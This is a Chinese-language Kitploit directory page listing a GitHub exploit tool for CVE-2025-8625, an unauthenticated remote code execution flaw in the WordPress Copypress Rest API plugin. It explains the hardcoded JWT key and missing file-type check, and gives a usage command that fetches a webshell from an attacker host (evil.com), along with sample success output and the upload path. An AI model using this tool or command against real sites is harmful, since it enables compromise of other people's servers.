Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-8625 — Copypress Rest API 1.1 - 1.2 - 缺少可配置的JWT密钥和文件类型验证,导致未认证远程代码执行 | Kitploit
工具/GitHubGitHub/nxploited/cve-2025-8625
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubnxploited/cve-2025-8625

CVE-2025-8625

Copypress Rest API 1.1 - 1.2 - 缺少可配置的JWT密钥和文件类型验证,导致未认证远程代码执行

查看仓库
210个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-8625

Copypress Rest API 1.1 - 1.2 - 缺少可配置的 JWT 密钥和文件类型验证,导致未经身份验证的远程代码执行

🛡️ Copypress Rest API 1.1 - 1.2 RCE 漏洞利用

📝 描述

WordPress 的 Copypress Rest API 插件(版本 1.1 至 1.2)通过 copyreap_handle_image() 函数存在 远程代码执行 漏洞。
当未设置密钥时,该插件使用硬编码的 JWT 签名密钥,并且不验证文件类型,从而允许未经身份验证的攻击者伪造令牌,并通过图像处理端点上传任意文件(例如 PHP webshell)。

  • CVE: CVE-2025-8625
  • CVSS: 9.8 (严重)

🚀 脚本概述

脚本名称: CVE-2025-8625.py
这个 Python 脚本可自动化利用该漏洞,允许你生成有效的 JWT、发送精心构造的请求,并将恶意文件(webshell)上传到存在漏洞的 WordPress 站点。


⚙️ 使用方法

root@kitploit:~
python CVE-2025-8625.py -u https://target.com -shell https://evil.com/shell.php
  • -u / --url:目标 WordPress 站点 URL
  • -shell / --shell:你的 webshell 或恶意 PHP 文件的直接链接

示例输出:

root@kitploit:~
JWT: eyJ0eXAiOiJKV1QiLCJhbGciOi...
HTTP 201: {"created":true,"id":123,"message":"Success"}
Exploit success! Check your shell upload.

🏆 功能特性

  • 使用插件硬编码的密钥生成有效的 JWT
  • 绕过身份验证以上传任意文件
  • 为利用成功/失败提供清晰的输出
  • 简单的命令行界面

📂 Shell 上传位置

Shell 上传成功!🎉
Shell 路径示例:

root@kitploit:~
https://target.com/wp-content/uploads/2025/10/shell.php

⚠️ 免责声明

该工具仅用于教育和授权的渗透测试目的。
在未经明确许可的情况下对目标进行使用是违法的。


作者:Nxploited (Khaled Alenazi)

下载工具